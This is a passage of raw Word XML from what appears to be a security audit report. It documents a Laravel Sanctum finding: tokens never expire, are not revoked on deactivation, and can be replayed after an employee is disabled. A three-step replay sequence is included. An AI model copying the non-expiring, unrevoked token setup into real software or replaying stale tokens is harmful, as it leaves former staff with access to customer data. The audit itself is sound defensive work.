oPwB&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATVutxk4DAACgCQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAfnTb298AAAAJAQAADwAAAAAAAAAAAAAA&#10;AACoBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAALQGAAAAAA==&#10;">
                <v:shape id="Shape 1336" o:spid="_x0000_s1027" style="position:absolute;width:342900;height:133350;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3429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ihqwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFLyZjVpCiK4iUqFHGwttb0N2TNJmZ9Ps1iT99V1B8DaP9znr7WAacaHO1ZYVzKMYBHFh&#10;dc2lgrfTYZaCcB5ZY2OZFIzkYLt5mKwx07bnV7rkvhQhhF2GCirv20xKV1Rk0EW2JQ7c2XYGfYBd&#10;KXWHfQg3jVzEcSIN1hwaKmxpX1Hxnf8aBcfP/Y99LgstbZN+/CVf4xO/50pNH4fdCoSnwd/FN/eL&#10;DvOXywSu34QT5OYfAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdlIoasMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l333375,v2630,,4876,930,6735,2791c341970,4651,342900,6890,342900,9525r,114300c342900,126448,341970,128687,340110,130547v-1859,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,342900,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Evidence.</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config/sanctum.php:49</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 xml:space="preserve">'expiration' =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">null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Tokens issued with default </w:t>
      </w:r>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abilities, prior tokens never revoked, logout deleting only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>currentAccessToken</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> checked at login and never again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA044B" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="363"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Exploit, executed end to end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07839F9F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="67" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="429" w:hanging="257"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>employee logs in            → token issued</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F394D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="67" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="429" w:hanging="257"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin sets </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false  →</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fresh logins refused (403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14963510" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="397" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="429" w:hanging="257"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the OLD token is replayed   → GET /me 200, still fully </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authorised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="617E647A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="59" w:line="394"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0448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BCBB2A6" wp14:editId="60916963">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-856561</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6480126" cy="1152525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26559" name="Group 26559"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1152525"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1152525"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1269" name="Shape 1269"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="714375"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="714375">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1451"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5023"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="709341"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="712924"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="713891"/>
                                  <a:pt x="6470001" y="714375"/>
                                  <a:pt x="6467474" y="714375"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="714375"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="714375"/>
                                  <a:pt x="14094" y="713891"/>
                                  <a:pt x="11760" y="712924"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="711957"/>
                                  <a:pt x="7366" y="710580"/>
                                  <a:pt x="5580" y="708794"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="706996"/>
                                  <a:pt x="2417" y="704943"/>
                                  <a:pt x="1450" y="702605"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="695325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11745"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7348"/>
                                  <a:pt x="5580" y="5569"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3777"/>
                                  <a:pt x="9426" y="2400"/>
                                  <a:pt x="11760" y="1439"/>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354" name="Shape 1354"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1819275" y="1019175"/>
                            <a:ext cx="1333500" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="930"/>
                                  <a:pt x="1330710" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4651"/>
                                  <a:pt x="1333500" y="6890"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="126448"/>
                                  <a:pt x="1332570" y="128687"/>
                                  <a:pt x="1330710" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="132407"/>
                                  <a:pt x="1326605" y="133338"/>
                                  <a:pt x="132397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357" name="Shape 1357"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4267199" y="1019175"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633526" y="930"/>
                                  <a:pt x="635385" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4651"/>
                                  <a:pt x="638175" y="6890"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126448"/>
                                  <a:pt x="637245" y="128687"/>
                                  <a:pt x="635385" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633526" y="132407"/>
                                  <a:pt x="631280" y="133338"/>
                                  <a:pt x="628650"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24056B4" id="Group 26559" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-67.45pt;width:510.25pt;height:90.75pt;z-index:-251436032" coordsize="64801,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&#10;">
                <v:shape id="Shape 1269" o:spid="_x0000_s1027" style="position:absolute;width:64801;height:7143;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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YZwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBG81qwetW6MUUchBSqvS87AZd5duJmETd9d/3whCb/N4n7PeDrYRHbWhdqxgNs1AEBfO&#10;1FwquJwPr28gQkQ22DgmBXcKsN2MXtaYG9fzN3WnWIoUwiFHBVWMPpcyFBVZDFPniRN3da3FmGBb&#10;StNin8JtI+dZtpAWa04NFXraVVT8nm5WQffzecyacNV+eVz2Wnt9239ppSbj4eMdRKQh/oufbm3S&#10;/PliBY9v0gly8wcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDElIYZwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1451l6480126,5023r,704318l6474764,712924v-2334,967,-4763,1451,-7290,1451l19050,714375v-2526,,-4956,-484,-7290,-1451c9426,711957,7366,710580,5580,708794,3793,706996,2417,704943,1450,702605l,695325,,19050,1450,11745c2417,9413,3793,7348,5580,5569,7366,3777,9426,2400,11760,1439,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,714375"/>
                </v:shape>
                <v:shape id="Shape 1354" o:spid="_x0000_s1028" style="position:absolute;left:18192;top:10191;width:13335;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1333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xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LFLzppqZKSV2lFB8VvJgG2uOQnWZTs7Mhu2r677uC4G0+vufMl71txJk6XztW8DROQBCX&#10;TtdcKSg+16MXED4ga2wck4I/8rBcPAzmmGl34QOd81CJGMI+QwUmhDaT0peGLPqxa4kj9+M6iyHC&#10;rpK6w0sMt42cJMlMWqw5Nhhs6d1QecxPVkG5+jqm+0O6dcZ8F5uiWe3a30Sp4WP/9goiUB/u4pv7&#10;Q8f56fQZrt/EE+TiHwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEb75YjEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l1323975,v2630,,4875,930,6735,2791c1332570,4651,1333500,6890,1333500,9525r,114300c1333500,126448,1332570,128687,1330710,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1333500,133350"/>
                </v:shape>
                <v:shape id="Shape 1357" o:spid="_x0000_s1029" style="position:absolute;left:42671;top:10191;width:6382;height:1334;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xLwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hhN5q1kerrGYXESxeCq2P+7gZN4ubyZJE3f77plDobT6+56zK3rbiTj40jhWMRxkI4srp&#10;hmsFx8P2ZQEiRGSNrWNS8E0BymLwtMJcuwd/0X0fa5FCOOSowMTY5VKGypDFMHIdceIuzluMCfpa&#10;ao+PFG5bOcmyN2mx4dRgsKONoeq6v1kF2e79rGl7mh3Ws+DNYuJuH59Oqedhv16CiNTHf/Gfe6fT&#10;/OnrHH6/SSfI4gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCkIDxLwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l628650,v2630,,4876,930,6735,2791c637245,4651,638175,6890,638175,9525r,114300c638175,126448,637245,128687,635385,130547v-1859,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">With no expiry, that access was </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permanent</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. A dismissed employee kept the ability to read customer records and cost prices and to cancel invoices. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>personal_access_tokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> table always had an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
